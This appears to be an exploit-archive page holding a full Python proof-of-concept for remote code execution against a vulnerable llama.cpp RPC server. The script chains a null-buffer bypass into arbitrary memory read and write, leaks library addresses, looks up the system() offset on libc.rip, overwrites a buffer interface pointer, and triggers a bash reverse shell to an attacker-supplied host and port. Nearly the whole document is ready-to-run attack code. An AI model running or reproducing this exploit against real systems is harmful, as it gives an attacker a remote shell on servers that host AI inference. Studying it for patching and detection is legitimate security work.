5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / linux_exploit_llama.py PY
#!/usr/bin/env python3
"""
Linux RCE Exploit — llama.cpp RPC Server b8487
Auther: @casp3r0x0 Hassan Ali 
Null-buffer bypass (pre-PR #20908) → arbitrary R/W → Memory-only Reverse Shell

Target: Any vulnerable distributed llama.cpp RPC Server
Run:    python3 linux_exploit.py <rpc_host> <rpc_port> <lhost> <lport>

Chain:
  1. ALLOC_BUFFER → remote_ptr (ggml_backend_buffer*), buffer_base (data region)
  2. Arb-read iface.get_base at remote_ptr+8 → function ptr in libggml-base.so
  3. Scan backward for ELF magic → libbase_base
  4. Arb-read GOT[memcpy] at libbase_base+0xa8598 → memory leak inside libc
  5. Scan backward from memcpy to find libc_base, and extract .note.gnu.build-id
  6. Query libc.rip API with the Build-ID to automatically resolve system() offset
  7. Write reverse shell string (padded to 56 bytes) + system_addr to buffer_base
  8. Arb-write those 64 bytes from buffer_base → remote_ptr (corrupts iface.clear)
  9. Trigger RPC_CMD_BUFFER_CLEAR → calls iface.clear(rp) → system("bash -c ...")
"""

import socket
import struct
import sys
import os
import time

#  Protocol constants 
RPC_CMD_ALLOC_BUFFER     = 0
RPC_CMD_BUFFER_GET_BASE  = 3
RPC_CMD_SET_TENSOR       = 6
RPC_CMD_GET_TENSOR       = 8
RPC_CMD_GRAPH_COMPUTE    = 10
RPC_CMD_DEVICE_COUNT     = 15
RPC_CMD_HELLO            = 14

GGML_TYPE_F32  = 0
GGML_OP_NONE   = 0
GGML_OP_CPY    = 34
GGML_MAX_SRC   = 10
TENSOR_BYTES   = 296

#  Offsets (verified against b8487 build on this system) 
# iface.get_base function ptr is in libggml-base.so; scan finds that lib's base
# libggml-base.so GOT slot for memcpy@GLIBC_2.14
BASE_GOT_MEMCPY     = 0xa8598
# libc symbol offsets — GOT[memcpy] resolves to the AVX IFUNC implementation
LIBC_OFF_MEMCPY     = 0x1a0880  # __memmove_avx_unaligned_erms (IFUNC result on this CPU)
LIBC_OFF_SYSTEM     = 0x50d70   # system@@GLIBC_2.2.5

# ggml_backend_buffer iface field offsets
IFACE_FREE_BUFFER   = 0x00   # iface.free_buffer — we write command here
IFACE_GET_BASE      = 0x08   # iface.get_base    — we write system_addr here


class RPCClient:
    def __init__(self, host: str, port: int):
        self.host = host
        self.port = port
        self.sock = None

    def connect(self):
        print(f"[*] Connecting to {self.host}:{self.port}")
        self.sock = socket.create_connection((self.host, self.port), timeout=15)
        self.sock.sendall(bytes([RPC_CMD_HELLO]))
        self.sock.sendall(struct.pack('<Q', 0))
        n = struct.unpack('<Q', self._recv_exact(8))[0]
        v = self._recv_exact(n)
        if len(v) >= 3:
            print(f"[+] Server version {v[0]}.{v[1]}.{v[2]}")

    def _recv_exact(self, n: int) -> bytes:
        buf = bytearray()
        while len(buf) < n:
            chunk = self.sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError(f"Connection closed ({len(buf)}/{n} bytes)")
            buf.extend(chunk)
        return bytes(buf)

    def _send_cmd(self, cmd: int, data: bytes = b''):
        self.sock.sendall(bytes([cmd]))
        self.sock.sendall(struct.pack('<Q', len(data)) + data)

    def _recv_response(self) -> bytes:
        n = struct.unpack('<Q', self._recv_exact(8))[0]
        return self._recv_exact(n) if n else b''

    def alloc_buffer(self, size: int = 0x10000, device: int = 0):
        self._send_cmd(RPC_CMD_ALLOC_BUFFER, struct.pack('<IQ', device, size))
        r = self._recv_response()
        ptr  = struct.unpack('<Q', r[:8])[0]
        rsz  = struct.unpack('<Q', r[8:16])[0]
        return ptr, rsz

    def get_buffer_base(self, remote_ptr: int) -> int:
        self._send_cmd(RPC_CMD_BUFFER_GET_BASE, struct.pack('<Q', remote_ptr))
        r = self._recv_response()
        return struct.unpack('<Q', r[:8])[0]

    def close(self):
        if self.sock:
            self.sock.close()

    #  Tensor packing 

    def _pack_tensor(self, tid: int, buf_ptr: int, data_ptr: int,
                     op: int, src_ids: list, n_elems: int, flags: int = 0) -> bytes:
        nb0 = 4
        nb1 = n_elems * 4
        d = bytearray()
        d += struct.pack('<Q', tid)
        d += struct.pack('<I', GGML_TYPE_F32)
        d += struct.pack('<Q', buf_ptr)
        for v in [n_elems, 1, 1, 1]:
            d += struct.pack('<I', v)
        for v in [nb0, nb1, nb1, nb1]:
            d += struct.pack('<I', v)
        d += struct.pack('<I', op)
        d += b'\x00' * 64                         # op_params
        d += struct.pack('<i', flags)              # flags
        for i in range(GGML_MAX_SRC):
            d += struct.pack('<Q', src_ids[i] if i < len(src_ids) else 0)
        d += struct.pack('<Q', 0)                  # view_src
        d += struct.pack('<Q', 0)                  # view_offs
        d += struct.pack('<Q', data_ptr)           # data
        d += b'\x00' * 64                         # name
        d += b'\x00' * 4                          # padding
        assert len(d) == TENSOR_BYTES, f"bad tensor size {len(d)}"
        return bytes(d)

    #  Primitives 

    def arb_read(self, remote_ptr: int, buffer_base: int,
                 target_addr: int, n_bytes: int) -> bytes:
        """Read n_bytes from target_addr using the null-buffer CPY bypass."""
        n_elems = max((n_bytes + 3) // 4, 1)
        src = self._pack_tensor(0x3001, 0,          target_addr,  GGML_OP_NONE, [],       n_elems)
        dst = self._pack_tensor(0x3002, remote_ptr, buffer_base,  GGML_OP_CPY,  [0x3001], n_elems, flags=16)

        body  = struct.pack('<I', 0)        # device_id
        body += struct.pack('<I', 1)        # n_nodes
        body += struct.pack('<Q', 0x3002)   # node_ids[0]
        body += struct.pack('<I', 2)        # n_tensors
        body += src + dst

        # GRAPH_COMPUTE has NO response
        self._send_cmd(RPC_CMD_GRAPH_COMPUTE, body)

        # Retrieve copied data via GET_TENSOR
        rt  = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_NONE, [], n_elems)
        req = rt + struct.pack('<Q', 0) + struct.pack('<Q', n_elems * 4)
        self._send_cmd(RPC_CMD_GET_TENSOR, req)
        return self._recv_response()

    def arb_write(self, remote_ptr: int, buffer_base: int, target_addr: int, n_bytes: int = 16):
        """Write whatever is at buffer_base to target_addr.
        Caller must have written the payload to buffer_base first via write_to_buf."""
        n_elems = (n_bytes + 3) // 4
        src = self._pack_tensor(0x4001, 0, buffer_base,  GGML_OP_NONE, [],       n_elems)
        dst = self._pack_tensor(0x4002, 0, target_addr,  GGML_OP_CPY,  [0x4001], n_elems, flags=16)

        body  = struct.pack('<I', 0)
        body += struct.pack('<I', 1)
        body += struct.pack('<Q', 0x4002)
        body += struct.pack('<I', 2)
        body += src + dst

        # GRAPH_COMPUTE has NO response
        self._send_cmd(RPC_CMD_GRAPH_COMPUTE, body)

    def write_to_buf(self, remote_ptr: int, buffer_base: int, payload: bytes):
        """Write payload to buffer_base using SET_TENSOR (valid buffer path)."""
        n_elems = max((len(payload) + 3) // 4, 1)
        tensor = self._pack_tensor(0x5001, remote_ptr, buffer_base, GGML_OP_NONE, [], n_elems)
        # SET_TENSOR format: rpc_tensor | offset (8) | data
        req = tensor + struct.pack('<Q', 0) + payload
        # SET_TENSOR has NO response
        self._send_cmd(RPC_CMD_SET_TENSOR, req)

    def read_qword(self, rp: int, bb: int, addr: int) -> int:
        d = self.arb_read(rp, bb, addr, 8)
        return struct.unpack('<Q', d[:8])[0] if len(d) >= 8 else None

    def read_dword(self, rp: int, bb: int, addr: int) -> int:
        d = self.arb_read(rp, bb, addr, 4)
        return struct.unpack('<I', d[:4])[0] if len(d) >= 4 else None

    def read_string(self, rp: int, bb: int, addr: int, max_len: int = 256) -> bytes:
        d = self.arb_read(rp, bb, addr, max_len)
        idx = d.find(b'\x00')
        if idx != -1:
            return d[:idx]
        return d

    def find_elf_base(self, rp: int, bb: int, start: int,
                      label: str, max_steps: int = 0x800) -> int:
        """Scan backwards from start (page-aligned) for ELF magic 0x7f454c46."""
        addr = start & ~0xFFF
        for step in range(max_steps):
            sig = self.read_dword(rp, bb, addr)
            if sig == 0x464c457f:               # b'\x7fELF'
                print(f"    [+] {label} base: 0x{addr:016x}  (step {step+1})")
                return addr
            addr -= 0x1000
        return None

    def find_libc_system_via_buildid(self, rp: int, bb: int, libc_base: int) -> int:
        import urllib.request
        import json
        
        print("\n[Step 4.5] Leaking libc Build-ID and querying libc.rip...")
        # Read the first 0x4000 bytes from libc_base to find the .note.gnu.build-id
        head = self.arb_read(rp, bb, libc_base, 0x4000)
        
        pattern = b'\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00'
        idx = head.find(pattern)
        if idx == -1:
            print("    [-] Could not find Build-ID in libc header.")
            return None
            
        build_id = head[idx + 16 : idx + 36].hex()
        print(f"    [+] Found Build-ID: {build_id}")
        
        print(f"    [+] Fetching offsets from https://libc.rip ...")
        url = 'https://libc.rip/api/find'
        data = json.dumps({'buildid': build_id}).encode('utf-8')
        req = urllib.request.Request(url, data=data, headers={'Content-Type': 'application/json'})
        try:
            with urllib.request.urlopen(req, timeout=15) as response:
                res = json.loads(response.read().decode('utf-8'))
                if res and isinstance(res, list) and len(res) > 0:
                    lib = res[0]
                    print(f"    [+] Matched libc: {lib['id']}")
                    if 'system' in lib['symbols']:
                        sys_off = int(lib['symbols']['system'], 16)
                        return sys_off
        except Exception as e:
            print(f"    [-] Failed to query API: {e}")
            
        return None


#  Main exploit 

def exploit(host: str, port: int, lhost: str, lport: int):
    client = RPCClient(host, port)
    client.connect()

    #  Stage 1: Allocate a staging buffer 
    print("\n[Step 1] Allocating staging buffer")
    remote_ptr, alloc_sz = client.alloc_buffer(0x10000)
    buffer_base = client.get_buffer_base(remote_ptr)
    print(f"    remote_ptr  = 0x{remote_ptr:016x}  (ggml_backend_buffer*)")
    print(f"    buffer_base = 0x{buffer_base:016x}  (data region)")
    rp, bb = remote_ptr, buffer_base

    #  Stage 2: Leak function pointer from iface.get_base 
    print("\n[Step 2] Leaking iface.get_base function pointer")
    getbase_ptr = client.read_qword(rp, bb, rp + IFACE_GET_BASE)
    print(f"    iface.get_base = 0x{getbase_ptr:016x}")
    if not getbase_ptr or getbase_ptr < 0x700000000000:
        print("[-] Unexpected pointer — check layout")
        return

    #  Stage 3: Find libggml-base.so base 
    print("\n[Step 3] Scanning backward for ELF magic → libggml-base.so base")
    libbase_base = client.find_elf_base(rp, bb, getbase_ptr, "libggml-base.so")
    if not libbase_base:
        print("[-] Could not find libggml-base ELF base"); return
    print(f"    libbase_base = 0x{libbase_base:016x}")

    #  Stage 4: Read GOT[memcpy] to leak libc 
    print("\n[Step 4] Reading GOT[memcpy] → libc leak")
    memcpy_addr = client.read_qword(rp, bb, libbase_base + BASE_GOT_MEMCPY)
    print(f"    memcpy@libc   = 0x{memcpy_addr:016x}")
    
    # We find libc_base dynamically
    libc_base = client.find_elf_base(rp, bb, memcpy_addr, "libc.so.6")
    if not libc_base:
        print("[-] Could not find libc base automatically!")
        return
        
    print(f"    libc_base     = 0x{libc_base:016x}")
    
    # Automatically get system offset by parsing remote memory Build-ID
    # and fetching from libc.rip archive database!
    sys_offset = client.find_libc_system_via_buildid(rp, bb, libc_base)
    
    if sys_offset:
        print(f"    [+] Automatically pulled system offset: 0x{sys_offset:x}")
        system_addr = libc_base + sys_offset
    else:
        print("    [!] Falling back to hardcoded system offset.")
        system_addr = libc_base + LIBC_OFF_SYSTEM
        
    print(f"    [+] Final payload variables:")
    print(f"    libc_base     = 0x{libc_base:016x}")
    print(f"    system()      = 0x{system_addr:016x}")

    #  Stage 5: Write payload to buffer_base 
    print("\n[Step 5] Writing payload to buffer_base")
    cmd = f'bash -c "bash -i>&/dev/tcp/{lhost}/{lport} 0>&1"'.encode()
    if len(cmd) > 55:
        print("[-] Payload too long (must be <= 55 chars)!")
        return
        
    payload = cmd.ljust(56, b'\x00') + struct.pack('<Q', system_addr)
    assert len(payload) == 64
    client.write_to_buf(rp, bb, payload)
    print(f"    payload: {payload}")

    #  Stage 6: Arb-write payload from buffer_base → remote_ptr 
    print("\n[Step 6] Corrupting iface via arb-write (buffer_base → remote_ptr)")
    client.arb_write(rp, bb, rp, n_bytes=64)
    print("    Done — iface.clear now = system()")

    #  Stage 7: Trigger 
    print("\n[Step 7] Triggering BUFFER_CLEAR → system(...)")
    print(f"    [!] Waiting for reverse shell on {lhost}:{lport} ...")
    try:
        # RPC_CMD_BUFFER_CLEAR = 5
        client._send_cmd(5, struct.pack('<QB', rp, 0))
        # Server will block in system() and not respond immediately
        time.sleep(1)
        print("    [+] Trigger command sent! Check your listener.")
    except Exception as e:
        print(f"    Connection closed: {e}  (shell spawned — check listener)")

    client.close()


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <rpc_host> <rpc_port> <lhost> <lport>")
        print(f"  rpc_host  — target RPC server IP")
        print(f"  rpc_port  — target RPC server port (default 50052)")
        print(f"  lhost     — your IP for the reverse shell to connect back to")
        print(f"  lport     — your listening port")
        print(f"\nExample: {sys.argv[0]} 10.10.10.5 50052 10.10.14.1 4444")
        sys.exit(1)
    host  = sys.argv[1]
    port  = int(sys.argv[2])
    lhost = sys.argv[3]
    lport = int(sys.argv[4])
    exploit(host, port, lhost, lport)